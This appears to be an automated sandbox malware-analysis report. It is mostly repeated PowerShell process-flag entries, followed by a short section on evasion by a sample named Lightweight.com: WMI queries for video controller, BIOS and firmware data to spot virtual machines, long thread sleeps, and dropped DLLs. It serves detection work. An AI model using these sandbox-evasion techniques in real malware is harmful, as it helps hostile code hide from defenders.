Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1977	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6483	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4287	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5531	Jump to behavior

Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com TID: 6280	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1344	Thread sleep count: 1977 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep count: 6483 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4112	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2204	Thread sleep count: 4287 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2204	Thread sleep count: 5531 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\709182	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
